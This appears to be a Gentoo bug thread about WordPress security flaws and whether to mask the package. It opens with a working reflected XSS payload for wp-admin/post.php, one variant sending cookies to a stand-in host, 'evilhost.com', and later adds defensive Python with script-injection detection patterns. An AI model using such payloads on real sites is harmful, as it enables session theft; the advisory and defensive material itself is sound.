Exploit:

Cookie in an alert box:

<iframe width=600 height=400 src='http://example.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Clol=%27'></iframe>

Cookie sent to an evil host:

<iframe width=600 height=400 src='http://example.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Eimage=document.createElement(%27img%27);image.src=%27http://evilhost.com/datagrabber.php?cookie=%27%2bdocument.cookie;%3C/script%3E%3Clol=%27'></iframe>

Reproducible: Didn't try

http://www.securityfocus.com/archive/1/461351

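Editor's note, as an added illustration that is neither part of the report nor WordPress code: the defect above is a reflected XSS in the `post` query parameter of post.php. The stand-in renderer below reproduces the unsafe concatenation, shows the two independent fixes a maintainer would want (strict validation of the id and HTML-attribute encoding of anything echoed back), and runs a simple detection check over constructed access-log lines carrying the report's own payload. The page markup, log lines and function names are assumptions; only the URL-encoded payload comes from the report.

```python
import html
import re
from urllib.parse import unquote

# The `post` value from the first iframe in the report above, still URL-encoded.
REPORT_PAYLOAD = "%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Clol=%27"


def render_vulnerable(post):
    """Assumed stand-in for the defective page: the parameter is pasted
    straight into an attribute value, so a quote closes the attribute and
    the rest of the payload is parsed as markup."""
    return "<input type='hidden' name='post' value='" + post + "'>"


def render_escaped(post):
    """Fix 1: encode for the HTML attribute context. quote=True also encodes
    ' and \", so the value can no longer terminate the attribute."""
    return "<input type='hidden' name='post' value='" + html.escape(post, quote=True) + "'>"


def parse_post_id(post):
    """Fix 2: a post id is a positive integer; reject anything else before it
    reaches the page. Returns the id, or None for invalid input."""
    if re.fullmatch(r"[1-9][0-9]{0,9}", post) is None:
        return None
    return int(post)


SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def contains_script_tag(rendered):
    """True when a <script ...> tag survives in the rendered HTML."""
    return SCRIPT_TAG.search(rendered) is not None


# Detection side: patterns worth alerting on when they appear in a decoded query string.
SUSPICIOUS = re.compile(r"<\s*script\b|javascript:|\bon\w+\s*=", re.IGNORECASE)


def flag_request_line(line):
    """True if a combined-format access log line looks like a script-injection
    attempt. The request path is URL-decoded twice so %2527-style double
    encoding does not hide the payload from the pattern."""
    m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
    if m is None:
        return False
    decoded = unquote(unquote(m.group(1)))
    return SUSPICIOUS.search(decoded) is not None


# Constructed sample log lines (not taken from any real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Mar/2007:10:00:00 +0000] '
    '"GET /wp-admin/post.php?action=delete&post=42 HTTP/1.1" 302 0',
    '192.0.2.11 - - [03/Mar/2007:10:00:05 +0000] '
    '"GET /wp-admin/post.php?action=delete&post=' + REPORT_PAYLOAD + ' HTTP/1.1" 200 1234',
]


def flagged_lines(lines):
    """Subset of log lines that trip the detection pattern."""
    return [line for line in lines if flag_request_line(line)]


if __name__ == "__main__":
    raw = unquote(REPORT_PAYLOAD)
    print("vulnerable:", render_vulnerable(raw))
    print("escaped:   ", render_escaped(raw))
    print("post id:   ", parse_post_id(raw))
    print("flagged:   ", len(flagged_lines(SAMPLE_LOG)))
```

Validation alone closes this particular hole because a numeric id cannot carry markup; encoding on output is still needed for every other parameter the admin pages echo, which is why both are shown.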
the ~arched tree is still vulnerable, please mask the vulnerable ebuild or ~keyword 2.1.1. (Or, both) Should we issue a GLSA? Personally I tend to think we should issue a GLSA warning our users that wordpress is no longer security-supported (either it's put in p.mask or in ~arch)
I'm pro-mask. I simply can't recommend anyone to use this app - if users want it, then they still can unmask...
Bad days for wordpress. Now, an exploit that was added by a cracker. http://wordpress.org/development/2007/03/upgrade-212/ Does this affect gentoo?
(In reply to comment #3)
> Bad days for wordpress. Now, an exploit that was added by a cracker.
> http://wordpress.org/development/2007/03/upgrade-212/
> Does this affect gentoo?

We've already noticed. Pretty much hard to say, no one upstream bothered to provide the hashes of 'genuine' vs. 'cracked' files. This thing needs to be completely masked and possibly just removed from portage; upstream can't be much more lame than this. :X

just found this by coincidence...

# Stefan Cornelius <dercorny@gentoo.org> (3 Mar 2007)
# Masking wordpress due to a long list of security bugs
# e.g. check bug #168529
www-apps/wordpress

since it seems to be masked now... do we want a mask GLSA?

Does this really need to be hard-masked? A major XSS vulnerability (at least the other one reported in bug #168449) is reportedly fixed now in 2.1.2. Also only the 2.1.1 package was tampered with and even that was only vulnerable between 2007-02-25 and 2007-03-02. Version 2.1.2 has replaced 2.1.1 due to the tampering. Also, I'm sure Wordpress could provide some digests of their "genuine" archive files if asked to guard from future tampering. At the least maybe arch-mask this across the board instead of hard-mask it since the security issues are *well* documented in other locations as well.
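Editor's note, as an added illustration (not code from this bug, WordPress or Portage): comment #4 complains that upstream published no hashes of the genuine versus cracked files, and the comment above suggests digests as the guard against future tampering. The snippet below shows what those digests buy a downloader: a whole-archive check against a published digest, and a per-member comparison that names exactly which file inside a tarball was altered. The archives, file names and contents are constructed in memory and stand in for nothing real. The check is only as strong as the channel the digest arrives over; a digest served from the same compromised host proves nothing.

```python
import hashlib
import hmac
import io
import tarfile


def sha256_hex(data):
    """Hex SHA-256 of a byte string."""
    return hashlib.sha256(data).hexdigest()


def verify_archive(data, expected_hex):
    """Compare the archive's digest with the published one in constant time."""
    return hmac.compare_digest(sha256_hex(data), expected_hex.lower())


def build_tar(members):
    """Build an uncompressed tar from {name: bytes} with fixed metadata so the
    same input always yields the same bytes (constructed test data only)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, content in sorted(members.items()):
            info = tarfile.TarInfo(name)
            info.size = len(content)
            info.mtime = 0
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def member_digests(data):
    """Per-file SHA-256 of every regular file inside a tar archive."""
    digests = {}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r") as tar:
        for info in tar:
            if info.isfile():
                digests[info.name] = sha256_hex(tar.extractfile(info).read())
    return digests


def changed_members(genuine, suspect):
    """Names of files that differ, or are missing/added, between two archives:
    the 'genuine vs. cracked files' list comment #4 wished upstream had published."""
    a, b = member_digests(genuine), member_digests(suspect)
    return sorted(name for name in set(a) | set(b) if a.get(name) != b.get(name))


# Constructed stand-ins; the file names and contents are not the real WordPress files.
GENUINE_FILES = {
    "wordpress/index.php": b"<?php // constructed stand-in for a shipped file\n",
    "wordpress/wp-includes/example.php": b"<?php // constructed stand-in for another shipped file\n",
}
GENUINE = build_tar(GENUINE_FILES)
PUBLISHED_SHA256 = sha256_hex(GENUINE)  # what upstream would publish next to the tarball

# A copy with one member altered, modelling a tampered download.
TAMPERED_FILES = dict(GENUINE_FILES)
TAMPERED_FILES["wordpress/wp-includes/example.php"] += b"// constructed marker for an injected line\n"
TAMPERED = build_tar(TAMPERED_FILES)


if __name__ == "__main__":
    print("genuine verifies: ", verify_archive(GENUINE, PUBLISHED_SHA256))
    print("tampered verifies:", verify_archive(TAMPERED, PUBLISHED_SHA256))
    print("changed members:  ", changed_members(GENUINE, TAMPERED))
```

This is the same idea Portage applies through the Manifest digest of a distfile: an archive swapped on the download site fails the digest check on the user's machine instead of being installed.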
some additional, related vulnerabilities: http://www.fadetoblack.ch/advisories/wordpress_2.1.1_multiple_script_injection_vulnerabilities.txt I'll vote for a GLSA - people need to know that Wordpress is no longer going to be supported, it's a popular webapp.
(In reply to comment #7)
> some additional, related vulnerabilities:
>
> http://www.fadetoblack.ch/advisories/wordpress_2.1.1_multiple_script_injection_vulnerabilities.txt
>
> I'll vote for a GLSA - people need to know that Wordpress is no longer going to
> be supported, it's a popular webapp.

I agree. Furthermore, there have been other security issues in the meantime. GLSA request filed

It should be noted that this vulnerability was filed within the date range that the tampered 2.1.1 file was available (2007-2-25 to 2007-3-2). If this is still the case in 2.1.2, then that's fine. Otherwise this shouldn't be grounds for masking 2.1.2 as well. Technically you could probably just outright remove 2.1.1 from the portage tree since it no longer exists as far as a version you can download from the wordpress.org site.

As far as 2.1.2, I still think arch mask is more fitting from a user's perspective. Hard mask to me implies either a development version or outright "unstable" behavior. For example, Joe user tries to use a common feature in an everyday kind of way (i.e. not injecting various SQL statements in odd places) and the software breaks something or outright crashes. This seems to be reinforced by the Gentoo Development Guide (http://devmanual.gentoo.org/keywording/):

"The package.mask file can be used to 'hard mask' individual or groups of ebuilds. This should be used for testing ebuilds or beta releases of software, and may also be used if a package has serious compatibility problems. Packages which are not hard masked must not have a dependency upon hard masked packages. The only time it is acceptable for a user to see the Possibly a DEPEND problem error message is if they have manually changed visibility levels for a package (for example, through /etc/portage/) and have missed a dependency. You should never commit a change which could cause this error to appear on a user system."

... This is not so much "unstable" as it is "security flawed", and finding such flaws is more indicative of a simple arch mask ... not a hard mask as the Development Guide would seem to dictate.

Either way a GLSA is a good step, I have no issue there. My only issue is with the level of masking on the 2.1.2 version.

Oops. 2.1.1 is already removed. You can disregard that part of my post.
(In reply to comment #6)
> Does this really need to be hard-masked? A major XSS vulnerability (at least the
> other one reported in bug #168449) is reportedly fixed now in 2.1.2. Also only
> the 2.1.1 package was tampered with and even that was only vulnerable
> between 2007-02-25 and 2007-03-02. Version 2.1.2 has replaced 2.1.1 due to the
> tampering.

I really don't know why all those people discovered so many vulnerabilities in wordpress during those last few weeks, see:
http://secunia.com/search/?search=wordpress
and
http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wordpress
That's impressive.

Wordpress definitely can't be considered as a stable package (arched) nor as a for-stable-testing package (~arched)

*** Bug 168449 has been marked as a duplicate of this bug. ***
(In reply to comment #11)
> (In reply to comment #6)
> > Does this really need to be hard-masked? A major XSS vulnerability (at least the
> > other one reported in bug #168449) is reportedly fixed now in 2.1.2. Also only
> > the 2.1.1 package was tampered with and even that was only vulnerable
> > between 2007-02-25 and 2007-03-02. Version 2.1.2 has replaced 2.1.1 due to the
> > tampering.
>
> I really don't know why all those people discovered so many vulnerabilities
> in wordpress during those last few weeks, see:
> http://secunia.com/search/?search=wordpress
> and
> http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wordpress
> That's impressive.
>
> Wordpress definitely can't be considered as a stable package (arched) nor as a
> for-stable-testing package (~arched)

You can't just look at the number of results just by searching "wordpress", say "Wow, that's a lot. This product must be really unstable", and leave it at that. Many of the vulnerabilities listed are for *much older versions* (i.e. previous to even 2.0). In at least one case on cve.mitre.org, there was a vulnerability that didn't have anything to do with Wordpress itself and yet it showed up in the search because it's just a simple partial text search (for example: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0574 ).

Two of the CVE vulnerabilities cite the same sources and are really two symptoms of the same vulnerability ( http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0540 and http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0541 ) and even those are more a problem with the 3rd party pingback function that wordpress uses rather than wordpress itself (they had a couple of issues with their implementation of it on top of the vulnerability but that has been fixed since version 2.1).

After looking through any listings that remotely appeared to possibly affect the current version (I think 2.0.9 could probably be dumped from the portage tree at this point) I've cut the list down to 3 "internal" vulnerabilities and one "external" vulnerability (i.e. the previously mentioned "pingback" vulnerability URLs), and even some of the internal vulnerabilities can be corrected by blocking the direct access of certain files through .htaccess.

URLs for "current" vulnerabilities:
http://secunia.com/advisories/24316/
http://secunia.com/advisories/24430/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1409

There was also one other "unfixed" vulnerability listed, but it's a pretty trivial one that's only valid for manual brute-force type attacks. It concerns differing error messages for bad user names and bad passwords. It may have been fixed by now (it was reported on version 2.0.5).
URL: http://secunia.com/advisories/23621/

too long for my tired eyes, sorry. Perhaps the maintainer will choose to put it back into ~arch later, we'll see.
(In reply to comment #14)
> too long for my tired eyes, sorry. Perhaps the maintainer will choose to put
> it back into ~arch later, we'll see.

Can we please close the security bugs now that it's hard masked? I'm not going to kill the 2.0.x branch since upstream is backporting security patches to it. And I'm not going to unmask it anytime soon since 2.0.5 through 2.0.9 were all security bugfix releases coming out on average two weeks apart each.

The hard mask is:

www-apps/wordpress

It seems to me that it should have been:

<www-apps/wordpress-2.1.2

Wordpress is, in general, a good product with an extremely active user community and good upstream maintenance. Additionally, the security problem with 2.1.1 wasn't with Wordpress itself, but the site from which wordpress is distributed. Wordpress is certainly not "unstable". Hard masking all of Wordpress does not seem like a response measured against the actual risk. Please consider changing the mask as above. Thank you.

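Editor's note, as an added illustration (not code from this bug or from Portage): comment #9 and the comment above turn on how much a package.mask line hides. The simplified model below parses a mask atom and reports which of a constructed list of versions it masks, so the difference between the bare atom `www-apps/wordpress` (every version) and the bounded `<www-apps/wordpress-2.1.2` (only older releases) can be checked directly. It understands only the comparison operators shown and plain dotted numeric versions; suffixes such as `_rc1` or `-r2` in real Portage versions are deliberately out of scope, and the version list is constructed from the numbers mentioned in this bug.

```python
import re

# Simplified atom grammar: optional comparison operator, category/package,
# and (only together with an operator) a plain dotted numeric version.
ATOM_RE = re.compile(
    r"^(?P<op>>=|<=|>|<|=)?(?P<cat>[A-Za-z0-9_+-]+)/(?P<pkg>[A-Za-z0-9_+-]+?)"
    r"(?:-(?P<ver>\d+(?:\.\d+)*))?$"
)


def version_key(ver):
    """Tuple of integer components so 2.10 sorts above 2.9 and 2.3 below 2.3.1."""
    return tuple(int(part) for part in ver.split("."))


def compare_versions(a, b):
    """-1, 0 or 1 for a < b, a == b, a > b."""
    ka, kb = version_key(a), version_key(b)
    return (ka > kb) - (ka < kb)


def parse_atom(text):
    """Split 'op cat/pkg-ver' into its parts; op and ver may be None."""
    m = ATOM_RE.match(text.strip())
    if m is None:
        raise ValueError("cannot parse atom: %r" % text)
    return m.group("op"), m.group("cat"), m.group("pkg"), m.group("ver")


def atom_matches(atom, cpv):
    """Does a package.mask atom select the concrete version cpv
    (e.g. 'www-apps/wordpress-2.1.3')?"""
    op, cat, pkg, ver = parse_atom(atom)
    if (op is None) != (ver is None):
        raise ValueError("operator and version must appear together in a mask atom: %r" % atom)
    cop, ccat, cpkg, cver = parse_atom(cpv)
    if cop is not None or cver is None:
        raise ValueError("expected a concrete category/package-version: %r" % cpv)
    if (cat, pkg) != (ccat, cpkg):
        return False
    if op is None:
        return True  # bare atom: every version of the package is masked
    c = compare_versions(cver, ver)
    return {"<": c < 0, "<=": c <= 0, "=": c == 0, ">=": c >= 0, ">": c > 0}[op]


def masked_versions(mask_lines, available):
    """Subset of available cpvs hidden by at least one line of a package.mask
    file; '#' lines are comments and blank lines are ignored."""
    atoms = [line.strip() for line in mask_lines
             if line.strip() and not line.lstrip().startswith("#")]
    return [cpv for cpv in available if any(atom_matches(a, cpv) for a in atoms)]


# Constructed inputs using the version numbers discussed in this bug.
AVAILABLE = [
    "www-apps/wordpress-2.0.9",
    "www-apps/wordpress-2.1.1",
    "www-apps/wordpress-2.1.2",
    "www-apps/wordpress-2.1.3",
]
WHOLE_PACKAGE_MASK = [
    "# Masking wordpress due to a long list of security bugs",
    "www-apps/wordpress",
]
BOUNDED_MASK = ["<www-apps/wordpress-2.1.2"]


if __name__ == "__main__":
    print("whole-package mask hides:", masked_versions(WHOLE_PACKAGE_MASK, AVAILABLE))
    print("bounded mask hides:      ", masked_versions(BOUNDED_MASK, AVAILABLE))
```

The bounded form has the property the comment asks for: a fixed release added later (2.1.3 here) is visible without anyone touching the mask file, whereas the bare atom keeps hiding it until the line is edited.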
GLSA 200703-23

Moving to enhancement pending resolution. Steve, please comment here if you unmask or remove future versions.

http://wordpress.org/development/2007/04/wordpress-213-and-2010/

Wordpress 2.1.3 and 2.0.10

We have a security update release now available for both the 2.1 and 2.0 branches of WordPress now available for immediate download. This update is highly recommended for all users of both branches.

----------

Lots of people are using wordpress. We should at least update the ebuild although it is being marked as masked.

web-apps what do you say?
For people that don't want to/can't wait much longer, copying the ebuild for 2.1.2 in an overlay and renaming it to wordpress-2.1.3.ebuild works just fine.
(In reply to comment #18)
> http://wordpress.org/development/2007/04/wordpress-213-and-2010/
>
> Wordpress 2.1.3 and 2.0.10
>
> We have a security update release now available for both the 2.1 and 2.0
> branches of WordPress now available for immediate download. This update is
> highly recommended for all users of both branches.

New ebuilds in CVS

(In reply to comment #21)
> New ebuilds in CVS

Does this mean it's going to be unmasked?

(In reply to comment #22)
> (In reply to comment #21)
> > New ebuilds in CVS
>
> Does this mean it's going to be unmasked?

No. Can we close the bug?

(In reply to comment #23)
> (In reply to comment #22)
> > (In reply to comment #21)
> > > New ebuilds in CVS
> >
> > Does this mean it's going to be unmasked?
>
> No.
>
> Can we close the bug?

If you're wanting to close the bug, then why not unmask it??? I mean what's the sense of keeping it masked if 2.1.3 and 2.0.10 are supposed to fix all the XSS issues?

(In reply to comment #24)
> (In reply to comment #23)
> > (In reply to comment #22)
> > > (In reply to comment #21)
> > > > New ebuilds in CVS
> > >
> > > Does this mean it's going to be unmasked?
> >
> > No.
> >
> > Can we close the bug?
>
> If you're wanting to close the bug, then why not unmask it??? I mean what's the
> sense of keeping it masked if 2.1.3 and 2.0.10 are supposed to fix all the XSS
> issues?

Sorry, I like wordpress as much as the next guy, but it has had a poor security track record recently, which led us to p.mask it in the first place. If things improve in the future, we'll look at it again, but now's not the time.

(In reply to comment #25)
> (In reply to comment #24)
> > (In reply to comment #23)
> > > (In reply to comment #22)
> > > > (In reply to comment #21)
> > > > > New ebuilds in CVS
> > > >
> > > > Does this mean it's going to be unmasked?
> > >
> > > No.
> > >
> > > Can we close the bug?
> >
> > If you're wanting to close the bug, then why not unmask it??? I mean what's the
> > sense of keeping it masked if 2.1.3 and 2.0.10 are supposed to fix all the XSS
> > issues?
>
> Sorry, I like wordpress as much as the next guy, but it has had a poor security
> track record recently, which led us to p.mask it in the first place.
>
> If things improve in the future, we'll look at it again, but now's not the
> time.

I guess it makes some sense when you put it that way. As long as there's a fair chance for the software to "redeem" itself, then I guess there's not as much of a problem. I'll just have to keep my "www-apps/wordpress" entry in package.unmask for a little while longer :-). I'm just hoping the hard mask doesn't "scare off" some people as much as ... say ... an alpha release of most any Microsoft product ( or beta ... or perhaps even "stable" depending on your point of view )

I know this just creates what I'm actually asking to stop... Can we have this be a bug, and not a forum? Thank you :)
Two weeks ago WordPress released a major security update in 2.2.1. Any chance of changing the hard/whole package mask to a "<www-apps/wordpress-2.2.1" mask? See: http://wordpress.org/support/topic/122939
(In reply to comment #28)
> Two weeks ago WordPress released a major security update in 2.2.1. Any chance
> of changing the hard/whole package mask to a "<www-apps/wordpress-2.2.1" mask?
>
> See: http://wordpress.org/support/topic/122939

My vote for it

(In reply to comment #28)
> Two weeks ago WordPress released a major security update in 2.2.1. Any chance
> of changing the hard/whole package mask to a "<www-apps/wordpress-2.2.1" mask?
>
> See: http://wordpress.org/support/topic/122939

As long as every little new Wordpress release contains security-relevant fixes I'd say: no.

And it's that time of the month again :P http://wordpress.org/development/2007/08/wordpress-222-and-2011/ New release including 2 security related fixes (XSS and SQL injection).
(In reply to comment #31)
> And it's that time of the month again :P
>
> http://wordpress.org/development/2007/08/wordpress-222-and-2011/
>
> New release including 2 security related fixes (XSS and SQL injection).

... and as usual just copying the ebuild works fine.

(In reply to comment #32)
> (In reply to comment #31)
> > And it's that time of the month again :P
> >
> > http://wordpress.org/development/2007/08/wordpress-222-and-2011/
> >
> > New release including 2 security related fixes (XSS and SQL injection).
>
> ... and as usual just copying the ebuild works fine.

thanks, bumped

Can this bug be closed? If not and it should be kept open as a reference that removal of the hard mask of wordpress might be just temporary then I suggest to modify the topic so that this becomes clear.
This bug should stay open until the mask is removed and we'd likely need to issue a new GLSA at that point. wrobel, feel free to change the title if you have one that suits better, I need more coffee here :)
(In reply to comment #35)
> This bug should stay open until the mask is removed and we'd likely need to
> issue a new GLSA at that point.
>
> wrobel, feel free to change the title if you have one that suits better, I need
> more coffee here :)

The p.mask is removed for >=2.3, but those are not stable.

Hmmm I guess we'll have to wait until it is stable again (if ever).
In the light of #208980 and the fact that this app had a number of sec issues during the months it has been unmasked the question has come up whether we completely move this app into the webapp-experimental overlay. I don't mind bumping wordpress once in a while but I also don't feel it is too good if we tell our users that this is a usable app. How does security feel about wordpress?
(In reply to comment #38)
> In the light of #208980 and the fact that this app had a number of sec issues
> during the months it has been unmasked the question has come up whether we
> completely move this app into the webapp-experimental overlay.
>
> I don't mind bumping wordpress once in a while but I also don't feel it is too
> good if we tell our users that this is a usable app.
>
> How does security feel about wordpress?

Like you said, new wordpress vulns pop up every month, so IMO it should stay p.masked. The webapp-experimental sounds like a plan.

I don't think it needs to move to an experimental overlay, if it is p.masked.
Okay, hard mask applied again.
Wordpress 2.5 has been released. http://wordpress.org/latest.tar.gz Would appreciate to see it included in portage tree. Thanks!
(In reply to comment #42)
> Wordpress 2.5 has been released. http://wordpress.org/latest.tar.gz
> Would appreciate to see it included in portage tree.
> Thanks!

2.5.1 in the tree

*** Bug 219912 has been marked as a duplicate of this bug. ***
Are there any other open vulnerabilities? If not, shall we unmask it? Thanks!
2.6 has been released, what's the status of that one?
Added wordpress-2.6. Let's see how this one fares during the next months but I don't really expect less sec bugs.
2.6.1 is out, would love to see it added to the tree.
2.6.2 is out, fixing a SQL column truncation issue that allows for user password reset.
Another one: #247468 :/
Another one: CVE-2008-5278 Luckily, we've only got 2.6.5 in tree.
How about Wordpress 2.7? Hopefully it will have a better security record :D.
Probably wordpress improved these days and upstream is working on bugs. What about unmasking it? I'm going to do this if nobody objects.
Also CVE-2008-5695. I'm against stabilizing it, as wordpress has too long a security record for my taste. If there are no bugs for three months I might change my mind, though.
(In reply to comment #54)
> Also CVE-2008-5695.
> I'm against stabilizing it, as wordpress has too long a security record for my
> taste. If there are no bugs for three months I might change my mind, though.

There's a difference between unmasking it (like Peter suggested) and stabilizing Wordpress.

3 _months_ for a php app? Not going to happen :). I agree that it should be unmasked. There is probably no reason to stabilize a package like this because changes will be so frequent, however, unless the policy were to be different (i.e. minor releases pushed stable immediately). FWIW in recent times it has been no worse than Drupal or Mediawiki.
Uuuh, why did I read stabilize there? Unmasking might be ok, but I'm against stabling.
(In reply to comment #57)
> Uuuh, why did I read stabilize there?
> Unmasking might be ok, but I'm against stabling.

I agree.

unmasked. Let's close this bug, noglsa since wordpress is now an unstable package.
ok, closing since it's now unmasked. We'll open new bugs as new issues pop up.